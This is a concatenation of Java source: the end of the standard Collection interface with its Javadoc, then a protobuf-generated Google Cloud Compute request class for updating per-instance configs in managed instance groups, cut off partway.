* * @param c collection containing elements to be added to this collection * @return {@code true} if this collection changed as a result of the call * @throws UnsupportedOperationException if the {@code addAll} operation * is not supported by this collection * @throws ClassCastException if the class of an element of the specified * collection prevents it from being added to this collection * @throws NullPointerException if the specified collection contains a * null element and this collection does not permit null elements, * or if the specified collection is null * @throws IllegalArgumentException if some property of an element of the * specified collection prevents it from being added to this * collection * @throws IllegalStateException if not all the elements can be added at * this time due to insertion restrictions * @see #add(Object) */ boolean addAll(Collection<? extends E> c); /** * Removes all of this collection's elements that are also contained in the * specified collection (optional operation). After this call returns, * this collection will contain no elements in common with the specified * collection. * * @param c collection containing elements to be removed from this collection * @return {@code true} if this collection changed as a result of the * call * @throws UnsupportedOperationException if the {@code removeAll} method * is not supported by this collection * @throws ClassCastException if the types of one or more elements * in this collection are incompatible with the specified * collection * (<a href="#optional-restrictions">optional</a>) * @throws NullPointerException if this collection contains one or more * null elements and the specified collection does not support * null elements * (<a href="#optional-restrictions">optional</a>), * or if the specified collection is null * @see #remove(Object) * @see #contains(Object) */ boolean removeAll(Collection<?> c); /** * Removes all of the elements of this collection that satisfy the given * predicate. 
Errors or runtime exceptions thrown during iteration or by * the predicate are relayed to the caller. * * @implSpec * The default implementation traverses all elements of the collection using * its {@link #iterator}. Each matching element is removed using * {@link Iterator#remove()}. If the collection's iterator does not * support removal then an {@code UnsupportedOperationException} will be * thrown on the first matching element. * * @param filter a predicate which returns {@code true} for elements to be * removed * @return {@code true} if any elements were removed * @throws NullPointerException if the specified filter is null * @throws UnsupportedOperationException if elements cannot be removed * from this collection. Implementations may throw this exception if a * matching element cannot be removed or if, in general, removal is not * supported. * @since 1.8 */ default boolean removeIf(Predicate<? super E> filter) { Objects.requireNonNull(filter); boolean removed = false; final Iterator<E> each = iterator(); while (each.hasNext()) { if (filter.test(each.next())) { each.remove(); removed = true; } } return removed; } /** * Retains only the elements in this collection that are contained in the * specified collection (optional operation). In other words, removes from * this collection all of its elements that are not contained in the * specified collection. 
* * @param c collection containing elements to be retained in this collection * @return {@code true} if this collection changed as a result of the call * @throws UnsupportedOperationException if the {@code retainAll} operation * is not supported by this collection * @throws ClassCastException if the types of one or more elements * in this collection are incompatible with the specified * collection * (<a href="#optional-restrictions">optional</a>) * @throws NullPointerException if this collection contains one or more * null elements and the specified collection does not permit null * elements * (<a href="#optional-restrictions">optional</a>), * or if the specified collection is null * @see #remove(Object) * @see #contains(Object) */ boolean retainAll(Collection<?> c); /** * Removes all of the elements from this collection (optional operation). * The collection will be empty after this method returns. * * @throws UnsupportedOperationException if the {@code clear} operation * is not supported by this collection */ void clear(); // Comparison and hashing /** * Compares the specified object with this collection for equality. <p> * * While the {@code Collection} interface adds no stipulations to the * general contract for the {@code Object.equals}, programmers who * implement the {@code Collection} interface "directly" (in other words, * create a class that is a {@code Collection} but is not a {@code Set} * or a {@code List}) must exercise care if they choose to override the * {@code Object.equals}. It is not necessary to do so, and the simplest * course of action is to rely on {@code Object}'s implementation, but * the implementor may wish to implement a "value comparison" in place of * the default "reference comparison." 
(The {@code List} and * {@code Set} interfaces mandate such value comparisons.)<p> * * The general contract for the {@code Object.equals} method states that * equals must be symmetric (in other words, {@code a.equals(b)} if and * only if {@code b.equals(a)}). The contracts for {@code List.equals} * and {@code Set.equals} state that lists are only equal to other lists, * and sets to other sets. Thus, a custom {@code equals} method for a * collection class that implements neither the {@code List} nor * {@code Set} interface must return {@code false} when this collection * is compared to any list or set. (By the same logic, it is not possible * to write a class that correctly implements both the {@code Set} and * {@code List} interfaces.) * * @param o object to be compared for equality with this collection * @return {@code true} if the specified object is equal to this * collection * * @see Object#equals(Object) * @see Set#equals(Object) * @see List#equals(Object) */ boolean equals(Object o); /** * Returns the hash code value for this collection. While the * {@code Collection} interface adds no stipulations to the general * contract for the {@code Object.hashCode} method, programmers should * take note that any class that overrides the {@code Object.equals} * method must also override the {@code Object.hashCode} method in order * to satisfy the general contract for the {@code Object.hashCode} method. * In particular, {@code c1.equals(c2)} implies that * {@code c1.hashCode()==c2.hashCode()}. * * @return the hash code value for this collection * * @see Object#hashCode() * @see Object#equals(Object) */ int hashCode(); /** * Creates a {@link Spliterator} over the elements in this collection. * * Implementations should document characteristic values reported by the * spliterator. Such characteristic values are not required to be reported * if the spliterator reports {@link Spliterator#SIZED} and this collection * contains no elements. 
* * <p>The default implementation should be overridden by subclasses that * can return a more efficient spliterator. In order to * preserve expected laziness behavior for the {@link #stream()} and * {@link #parallelStream()} methods, spliterators should either have the * characteristic of {@code IMMUTABLE} or {@code CONCURRENT}, or be * <em><a href="Spliterator.html#binding">late-binding</a></em>. * If none of these is practical, the overriding class should describe the * spliterator's documented policy of binding and structural interference, * and should override the {@link #stream()} and {@link #parallelStream()} * methods to create streams using a {@code Supplier} of the spliterator, * as in: * <pre>{@code * Stream<E> s = StreamSupport.stream(() -> spliterator(), spliteratorCharacteristics) * }</pre> * <p>These requirements ensure that streams produced by the * {@link #stream()} and {@link #parallelStream()} methods will reflect the * contents of the collection as of initiation of the terminal stream * operation. * * @implSpec * The default implementation creates a * <em><a href="Spliterator.html#binding">late-binding</a></em> spliterator * from the collection's {@code Iterator}. The spliterator inherits the * <em>fail-fast</em> properties of the collection's iterator. * <p> * The created {@code Spliterator} reports {@link Spliterator#SIZED}. * * @implNote * The created {@code Spliterator} additionally reports * {@link Spliterator#SUBSIZED}. * * <p>If a spliterator covers no elements then the reporting of additional * characteristic values, beyond that of {@code SIZED} and {@code SUBSIZED}, * does not aid clients to control, specialize or simplify computation. * However, this does enable shared use of an immutable and empty * spliterator instance (see {@link Spliterators#emptySpliterator()}) for * empty collections, and enables clients to determine if such a spliterator * covers no elements. 
* * @return a {@code Spliterator} over the elements in this collection * @since 1.8 */ @Override default Spliterator<E> spliterator() { return Spliterators.spliterator(this, 0); } /** * Returns a sequential {@code Stream} with this collection as its source. * * <p>This method should be overridden when the {@link #spliterator()} * method cannot return a spliterator that is {@code IMMUTABLE}, * {@code CONCURRENT}, or <em>late-binding</em>. (See {@link #spliterator()} * for details.) * * @implSpec * The default implementation creates a sequential {@code Stream} from the * collection's {@code Spliterator}. * * @return a sequential {@code Stream} over the elements in this collection * @since 1.8 */ default Stream<E> stream() { return StreamSupport.stream(spliterator(), false); } /** * Returns a possibly parallel {@code Stream} with this collection as its * source. It is allowable for this method to return a sequential stream. * * <p>This method should be overridden when the {@link #spliterator()} * method cannot return a spliterator that is {@code IMMUTABLE}, * {@code CONCURRENT}, or <em>late-binding</em>. (See {@link #spliterator()} * for details.) * * @implSpec * The default implementation creates a parallel {@code Stream} from the * collection's {@code Spliterator}. * * @return a possibly parallel {@code Stream} over the elements in this * collection * @since 1.8 */ default Stream<E> parallelStream() { return StreamSupport.stream(spliterator(), true); } }
googleapis/google-cloud-java
35,885
java-compute/proto-google-cloud-compute-v1/src/main/java/com/google/cloud/compute/v1/InstanceGroupManagersUpdatePerInstanceConfigsReq.java
/* * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * https://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ // Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/cloud/compute/v1/compute.proto // Protobuf Java Version: 3.25.8 package com.google.cloud.compute.v1; /** * * * <pre> * InstanceGroupManagers.updatePerInstanceConfigs * </pre> * * Protobuf type {@code google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq} */ public final class InstanceGroupManagersUpdatePerInstanceConfigsReq extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) InstanceGroupManagersUpdatePerInstanceConfigsReqOrBuilder { private static final long serialVersionUID = 0L; // Use InstanceGroupManagersUpdatePerInstanceConfigsReq.newBuilder() to construct. 
private InstanceGroupManagersUpdatePerInstanceConfigsReq( com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private InstanceGroupManagersUpdatePerInstanceConfigsReq() { perInstanceConfigs_ = java.util.Collections.emptyList(); } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance(UnusedPrivateParameter unused) { return new InstanceGroupManagersUpdatePerInstanceConfigsReq(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.class, com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.Builder .class); } public static final int PER_INSTANCE_CONFIGS_FIELD_NUMBER = 526265001; @SuppressWarnings("serial") private java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> perInstanceConfigs_; /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> getPerInstanceConfigsList() { return perInstanceConfigs_; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public java.util.List<? 
extends com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsOrBuilderList() { return perInstanceConfigs_; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public int getPerInstanceConfigsCount() { return perInstanceConfigs_.size(); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public com.google.cloud.compute.v1.PerInstanceConfig getPerInstanceConfigs(int index) { return perInstanceConfigs_.get(index); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ @java.lang.Override public com.google.cloud.compute.v1.PerInstanceConfigOrBuilder getPerInstanceConfigsOrBuilder( int index) { return perInstanceConfigs_.get(index); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { for (int i = 0; i < perInstanceConfigs_.size(); i++) { output.writeMessage(526265001, perInstanceConfigs_.get(i)); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; for (int i = 0; i < perInstanceConfigs_.size(); i++) { size += com.google.protobuf.CodedOutputStream.computeMessageSize( 
526265001, perInstanceConfigs_.get(i)); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq)) { return super.equals(obj); } com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq other = (com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) obj; if (!getPerInstanceConfigsList().equals(other.getPerInstanceConfigsList())) return false; if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (getPerInstanceConfigsCount() > 0) { hash = (37 * hash) + PER_INSTANCE_CONFIGS_FIELD_NUMBER; hash = (53 * hash) + getPerInstanceConfigsList().hashCode(); } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom( 
com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( PARSER, input, extensionRegistry); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq 
parseFrom(com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); } public static com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3.parseWithIOException( PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * * * <pre> * InstanceGroupManagers.updatePerInstanceConfigs * </pre> * * Protobuf type {@code google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReqOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() 
{ return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.class, com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.Builder .class); } // Construct using // com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq.newBuilder() private Builder() {} private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; if (perInstanceConfigsBuilder_ == null) { perInstanceConfigs_ = java.util.Collections.emptyList(); } else { perInstanceConfigs_ = null; perInstanceConfigsBuilder_.clear(); } bitField0_ = (bitField0_ & ~0x00000001); return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.cloud.compute.v1.Compute .internal_static_google_cloud_compute_v1_InstanceGroupManagersUpdatePerInstanceConfigsReq_descriptor; } @java.lang.Override public com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq getDefaultInstanceForType() { return com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq .getDefaultInstance(); } @java.lang.Override public com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq build() { com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq buildPartial() { com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq result = new com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq(this); 
buildPartialRepeatedFields(result); if (bitField0_ != 0) { buildPartial0(result); } onBuilt(); return result; } private void buildPartialRepeatedFields( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq result) { if (perInstanceConfigsBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0)) { perInstanceConfigs_ = java.util.Collections.unmodifiableList(perInstanceConfigs_); bitField0_ = (bitField0_ & ~0x00000001); } result.perInstanceConfigs_ = perInstanceConfigs_; } else { result.perInstanceConfigs_ = perInstanceConfigsBuilder_.build(); } } private void buildPartial0( com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq result) { int from_bitField0_ = bitField0_; } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) { return mergeFrom( (com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq) other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom( 
com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq other) { if (other == com.google.cloud.compute.v1.InstanceGroupManagersUpdatePerInstanceConfigsReq .getDefaultInstance()) return this; if (perInstanceConfigsBuilder_ == null) { if (!other.perInstanceConfigs_.isEmpty()) { if (perInstanceConfigs_.isEmpty()) { perInstanceConfigs_ = other.perInstanceConfigs_; bitField0_ = (bitField0_ & ~0x00000001); } else { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.addAll(other.perInstanceConfigs_); } onChanged(); } } else { if (!other.perInstanceConfigs_.isEmpty()) { if (perInstanceConfigsBuilder_.isEmpty()) { perInstanceConfigsBuilder_.dispose(); perInstanceConfigsBuilder_ = null; perInstanceConfigs_ = other.perInstanceConfigs_; bitField0_ = (bitField0_ & ~0x00000001); perInstanceConfigsBuilder_ = com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders ? getPerInstanceConfigsFieldBuilder() : null; } else { perInstanceConfigsBuilder_.addAllMessages(other.perInstanceConfigs_); } } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case -84847286: { com.google.cloud.compute.v1.PerInstanceConfig m = input.readMessage( com.google.cloud.compute.v1.PerInstanceConfig.parser(), extensionRegistry); if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(m); } else { perInstanceConfigsBuilder_.addMessage(m); } break; } // case -84847286 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an 
endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int bitField0_; private java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> perInstanceConfigs_ = java.util.Collections.emptyList(); private void ensurePerInstanceConfigsIsMutable() { if (!((bitField0_ & 0x00000001) != 0)) { perInstanceConfigs_ = new java.util.ArrayList<com.google.cloud.compute.v1.PerInstanceConfig>( perInstanceConfigs_); bitField0_ |= 0x00000001; } } private com.google.protobuf.RepeatedFieldBuilderV3< com.google.cloud.compute.v1.PerInstanceConfig, com.google.cloud.compute.v1.PerInstanceConfig.Builder, com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> perInstanceConfigsBuilder_; /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<com.google.cloud.compute.v1.PerInstanceConfig> getPerInstanceConfigsList() { if (perInstanceConfigsBuilder_ == null) { return java.util.Collections.unmodifiableList(perInstanceConfigs_); } else { return perInstanceConfigsBuilder_.getMessageList(); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public int getPerInstanceConfigsCount() { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.size(); } else { return perInstanceConfigsBuilder_.getCount(); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig getPerInstanceConfigs(int index) { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.get(index); } else { return perInstanceConfigsBuilder_.getMessage(index); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder setPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.set(index, value); onChanged(); } else { perInstanceConfigsBuilder_.setMessage(index, value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder setPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.set(index, builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.setMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs(com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(value); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig value) { if (perInstanceConfigsBuilder_ == null) { if (value == null) { throw new NullPointerException(); } ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(index, value); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(index, value); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addPerInstanceConfigs( int index, com.google.cloud.compute.v1.PerInstanceConfig.Builder builderForValue) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.add(index, builderForValue.build()); onChanged(); } else { perInstanceConfigsBuilder_.addMessage(index, builderForValue.build()); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder addAllPerInstanceConfigs( java.lang.Iterable<? extends com.google.cloud.compute.v1.PerInstanceConfig> values) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); com.google.protobuf.AbstractMessageLite.Builder.addAll(values, perInstanceConfigs_); onChanged(); } else { perInstanceConfigsBuilder_.addAllMessages(values); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder clearPerInstanceConfigs() { if (perInstanceConfigsBuilder_ == null) { perInstanceConfigs_ = java.util.Collections.emptyList(); bitField0_ = (bitField0_ & ~0x00000001); onChanged(); } else { perInstanceConfigsBuilder_.clear(); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
* </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public Builder removePerInstanceConfigs(int index) { if (perInstanceConfigsBuilder_ == null) { ensurePerInstanceConfigsIsMutable(); perInstanceConfigs_.remove(index); onChanged(); } else { perInstanceConfigsBuilder_.remove(index); } return this; } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfig.Builder getPerInstanceConfigsBuilder( int index) { return getPerInstanceConfigsFieldBuilder().getBuilder(index); } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public com.google.cloud.compute.v1.PerInstanceConfigOrBuilder getPerInstanceConfigsOrBuilder( int index) { if (perInstanceConfigsBuilder_ == null) { return perInstanceConfigs_.get(index); } else { return perInstanceConfigsBuilder_.getMessageOrBuilder(index); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. * </pre> * * <code>repeated .google.cloud.compute.v1.PerInstanceConfig per_instance_configs = 526265001; * </code> */ public java.util.List<? extends com.google.cloud.compute.v1.PerInstanceConfigOrBuilder> getPerInstanceConfigsOrBuilderList() { if (perInstanceConfigsBuilder_ != null) { return perInstanceConfigsBuilder_.getMessageOrBuilderList(); } else { return java.util.Collections.unmodifiableList(perInstanceConfigs_); } } /** * * * <pre> * The list of per-instance configurations to insert or patch on this managed instance group. 
